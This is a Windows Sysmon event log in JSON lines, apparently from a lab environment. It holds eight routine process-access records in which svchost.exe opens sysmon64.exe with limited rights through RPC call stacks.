{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1531,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1532,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1533,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1534,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1535,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1536,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1537,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1538,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
